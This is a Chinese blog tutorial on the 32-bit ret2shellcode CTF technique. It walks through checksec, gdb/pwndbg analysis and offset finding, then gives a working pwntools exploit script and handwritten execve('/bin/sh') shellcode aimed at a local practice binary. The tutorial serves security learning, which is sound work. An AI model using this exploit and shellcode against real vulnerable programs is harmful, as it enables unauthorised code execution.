【Pwn】Rop-Ret2Shellcode-32位

已于 2023-02-26 21:30:22 修改
阅读量741 收藏 1
点赞数
分类专栏: CTF 文章标签: 安全
于 2022-05-24 19:42:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52553215/article/details/124870880
版权

目录

linux系统调用:

获取shellcode两种方式:

1.手写

2.pwntools自动生成

NX保护:

例:

ret2text漏洞依赖于程序中存在system(“/bin/sh”)的函数

若没有此函数,可以传入自定义shellcode

//shellcode是黑客编写的用于实行特定功能的汇编代码,例如:execve(“/bin/sh”,null,null);

Ret2Shellcode条件:1.无执行shell的函数

                                  2.没有开启NX保护

Ret2libc条件:1.开启NX

                        2.使用libc函数:leak libc + ROP

linux系统调用:

系统调用号目录:/usr/include/x86_64-linux-gnu/asm/unistd_32.h

 11号execve能帮我们执行任意的shell

 参数为execve所需的参数

当系统执行到int 0x80时,会跳转到execve(因为在eax中)

获取shellcode两种方式:

1.手写

(1)想办法调用execve(“/bin/sh”,null,null);

(2)传入字符串/bin///sh

(3)系统调用execve

eax = 11

ebx = bin_sh_addr(参数一)

ecx = 0(参数二)

edx = 0(参数三)

2.pwntools自动生成

(1)先指定context.arch = "i386/amd64"

(2)asm(自定义shellcode)或 asm(shellcraft.sh())

(3)自动生成shellcode

NX保护:

又称DEP,数据执行保护:可写的不可执行,可执行的不可写

例:

拿到文件

1.checksec xxx

发现无NX,无canary保护,可以考虑用ret2text或ret2shellcode

2.查看是否有系统函数system(“/bin/sh”);

objdump -d -xxx |grep system        //-d显示汇编

发现什么都没找到,只能用ret2shellcode

3.gdb xxx

(示例用的pwndbg)

disass main        //看一下main函数

看一下:

 又看到了gets函数

 分析可知,参数来源于 esp+0x1c

又看到了strncpy函数

 分析可知,拷贝0x64个字节,参数来自于 esp+0x1c,拷贝到0x804a080

思路:

两个参数都来自于esp+0x1c,可以利用gets收到shellcode放入esp+0x1c,顺便覆盖返回地址为0x804a080,然后利用strncpy函数,将shellcode拷贝到0x804a080,这样返回时就返回到了shellcode。

4.查看一下要拷贝的那个地址所在的段要没有执行权限

/*因为vmmap直接显示了地址,所以以下步骤不需要

查看要拷贝的那个地址所在的段

gdb(peda):readelf 文件名

shell:readelf -S  文件名(注意大小写,一定是大S)

找到0x804a080(找到了 .bss 0x804a040,0x804a080应该属于这个段)

*/

打开gdb,下断点运行

vmmap

找到0x804a080,有x(执行)权限

5.找到偏移量

pwndbg

cyclic 200

复制

r

粘贴

程序崩溃,给出报错地址

cyclic -l 报错地址

得到偏移112

6.exp

from pwn import *

context(arch = "i386",os = "linux",log_level = "debug")        //因为涉及到了shellcode,需要指定环境为32位,影响下面生成的shellcode;下划线内容可不带

p = process("./ret2shellcode")

shellcode = asm(shellcraft.sh())        //生成了shellcode,但不确定长度,要将长度确定为112

payload = shellcode.ljust(112,'A') + p32(0x804a080)   //ljust(112,'A')使shellcode长度确定为112,不够112用A填充

p.sendline(payload)

p.interactive()

试试手写汇编:

shellcode = asm("""

push 0x68

push 0x732f2f2f

push 0x6e69622f

mov ebx,esp

xor ecx,ecx

xor edx,edx

push 11

pop eax

int 0x80

""")

轻闲一号机
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN基础10:Ret2Shellcode 32位实例
prettyX的博客
07-14 1057
0x01 Ret2Text的局限性
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
RELRO保护原理
weixin_62675330的博客
04-08 2581
RELRO保护原理 简介 由于 GOT和PLT以及延迟绑定的原因,在启用延迟绑定时,符号解析只发生在第一次使用的时候,该过程是通过PLT表进行的,解析完成后,相应的GOT条目会被修改为正确的函数地址。因此,在延迟绑定的情况下。.got.plt必须可写,这就给了攻击者篡改地址劫持程序的执行的可能。 RELRO(ReLocation Read-Only)机制的提出就是为了解决延迟绑定的安全问题,它最初于2004年由Redhat的工程师Jakub jelnek实现,他将符号重定位表设置为只读,或者在程序启动时就解
ROP之ret2alsolve(32位)详解
最新发布
zhuo1358的博客
06-18 717
这几段的关系是这样的,通过link_map_obj定位.dynamic段,在通过偏移定位到.rel.plt段,.dynstr段,.dynsym段,这里的偏移程序会给,不用我们操心,然后再通过realoc_index来确定.rel.plt段对应的函数结构体,从而找到对应函数的got表位置,再通过(r_info
Linux pwn入门教程(2)——shellcode的使用,原理与变形
dfdhxb995397的博客
07-03 724
作者:Tangerine@SAINTSEC 0×00 shellcode的使用 在上一篇文章中我们学习了怎么使用栈溢出劫持程序的执行流程。为了减少难度,演示和作业题程序里都带有很明显的后门。然而在现实世界里并不是每个程序都有后门,即使是有,也没有那么好找。因此,我们就需要使用定制的shellcode来执行自己需要的操作。 首先我们把演示程序~/Openctf 2016-tyro_s...
PWN:[Week1]safe_shellcode
m0_53932372的博客
10-19 563
pwn
PWN知识点整理(1)Shellcode
qq_52469954的博客
10-26 232
0day安全:软件漏洞分析技术(第2版)
pwn07.ret2syscall例题
11-11
ret2syscall例题
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
利器!schelper151_shellcode转为64位汇编32位汇编(包密码为123)
02-10
schelper151 包的密码为123,为了防被杀。 shellcode转为64位汇编32位汇编 也可以将64位汇编32位汇编转为各种类型的shellcode,利器!! 例如我要将C语言数组类型的shellcode转化为64位汇编,命令为: schelper.exe -i c.txt -s 0 -d 27 -dp x64 其中把shellcode写到文件c.txt
关于pwn64位amd构造payload时的堆栈平衡问题以及32位与64位构造payload的区别与注意事项
hu_c_t_f的博客
07-24 2420
pwn入门,栈溢出漏洞是比较合适的。但我们经常会遇到i386【下面称32位】和arm64【下面称64位】的可执行程序【题目附件】。而32位与64位同样的情况,比如同样是ret2text或ret2syscall时,写的payload是不一样的,但大体的思路是一样的。本人也是入门pwn的小白,写的不对的地方还请师傅们指出。栈堆平衡32位中,没有堆栈平衡一说,而64位中有。payload中的堆栈平衡简单来说,就是要保证payload的字节数是16的倍数。
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考
Tokameine的博客
09-07 542
总之先从题目开始看吧,是一道非常简单但却让我长见识的题...... int overflow() { char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1); } 明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法 ROPgadget --binary rop --ropchain ROP chain...
入门pwn题目ret2text
llrraa2010的专栏
03-26 113
同时发现get_shell函数可以打开shell,地址为0x8048522。用32位ida打开,f5看函数,发现vulnerable存在溢出。看堆栈,返回的地址存在0x8c,buf地址为0x78,偏离20。
PWN-shellcode获取与编写
热门推荐
杀生丸?不,其实我要的是桔梗
03-16 1万+
当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。 而shellcode该怎么获得呢? 一、获取集成写好的 1.From pwntools (1)先设置目标机的参数 context(os=’linux’, arch=’amd64’, log_level=’debug’) 1. os设置系统为linux系统,在完成ctf题目的...
pwn刷题num28---ret2text
tbsqigongzi的博客
04-27 273
BUUCTF-PWN- jarvisoj_level2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 看一下 vulnerable_function();函数 栈溢出,read函数读入0x100字节放在buf处,而buf只有0x88字节大小,可以覆盖返回地
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 4577
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
使用C编写shellcode
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
11-23 877
使用C编写shellcode 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为 shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代 码仅能靠它自己,作者无法使用现 代软件开发的实践来推进shellcode的编写。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值